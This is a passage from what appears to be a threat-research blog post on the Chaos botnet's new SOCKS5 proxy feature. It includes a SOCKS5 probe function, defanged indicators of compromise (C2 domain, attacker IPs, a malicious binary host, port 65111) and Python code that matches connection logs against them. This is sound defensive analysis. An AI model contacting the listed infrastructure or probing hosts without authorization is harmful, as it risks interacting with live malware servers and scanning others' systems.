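    return bytes([SOCKS5_VERSION, len(methods), *methods])


def is_socks5_reply(reply: bytes) -> bool:
    """A SOCKS5 server answers with exactly two bytes: version and method.

    A method byte of 0xFF means no offered method was accepted, but the
    peer is still a SOCKS5 server.
    """
    return len(reply) == 2 and reply[0] == SOCKS5_VERSION


def probe(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if host:port answers the greeting like a SOCKS5 server."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            conn.sendall(build_greeting())
            return is_socks5_reply(conn.recv(2))
    except OSError:
        # Connection refused, timed out, or reset: not a reachable proxy.
        return False
```

A probe like this should only be run against hosts you own or are authorized to test, for example as part of triaging an unexplained listening port.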

In previous cases, other DDoS botnets, such as Aisuru, have been observed pivoting to offer proxying services to other cybercriminals. The creators of Chaos may have taken note of this trend and added similar functionality to expand their monetization options and enhance the capabilities of their own botnet, helping ensure they do not fall behind competing operators.

The sample contains an embedded domain, gmserver.osfc[.]org[.]cn, which it uses to resolve the IP of its C2 server. At the time of writing, the domain resolves to 70[.]39.181.70, an IP owned by NetLabel Global and geolocated in Hong Kong.

Historically, the domain has also resolved to 154[.]26.209.250, owned by Kurun Cloud, a low-cost VPS provider that offers dedicated server rentals. The malware uses port 65111 for sending and receiving commands, although neither IP appears to be actively accepting connections on this port at the time of writing.

Key takeaways

While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expanding their botnets and enhancing the capabilities at their disposal. Previously reported versions of Chaos malware already featured the ability to exploit a wide range of router CVEs, and its recent shift towards targeting Linux cloud-server vulnerabilities will further broaden its reach.

It is therefore important that security teams patch CVEs and ensure strong security configuration for applications deployed in the cloud, particularly as the cloud market continues to grow rapidly while available security tooling struggles to keep pace.

The recent shift in botnets such as Aisuru and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams. Proxies allow attackers to bypass rate limits and mask their tracks, enabling more complex forms of cybercrime while making it significantly harder for defenders to detect and block malicious campaigns.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Indicators of Compromise (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos Malware hash

182[.]90.229.95 - Attacker IP

pan.tenire[.]com (107[.]189.10.219) - Server hosting malicious binaries

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - Attacker C2 Server
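The indicators above are defanged with [.] so they cannot be clicked or resolved by accident. To match them against connection logs they first need to be converted back. The following is a minimal sketch, assuming a log source that yields a destination host and port per connection. The function names and the log shape are hypothetical, while the indicators and the C2 port 65111 are taken from this post.

```python
def refang(indicator: str) -> str:
    """Convert a defanged indicator such as 1[.]2.3.4 back to its real form."""
    return indicator.replace("[.]", ".")


# Indicators are stored defanged and refanged only at runtime.
IOC_IPS = {refang(ip) for ip in (
    "182[.]90.229.95",
    "107[.]189.10.219",
    "70[.]39.181.70",
    "154[.]26.209.250",
)}
IOC_DOMAINS = {refang(d) for d in (
    "pan.tenire[.]com",
    "gmserver.osfc[.]org[.]cn",
)}
C2_PORT = 65111


def match_connection(dest_host: str, dest_port: int) -> list[str]:
    """Return the reasons, if any, that a connection matches the IoCs."""
    reasons = []
    host = dest_host.lower().rstrip(".")
    if host in IOC_IPS:
        reasons.append("known IoC address")
    if host in IOC_DOMAINS:
        reasons.append("known IoC domain")
    if dest_port == C2_PORT:
        reasons.append("Chaos C2 port")
    return reasons
```

A port match on its own is weak evidence, since 65111 can be chosen as an ephemeral source or destination port by legitimate software, so it is best treated as a supporting signal alongside an address or domain match.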

References

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/
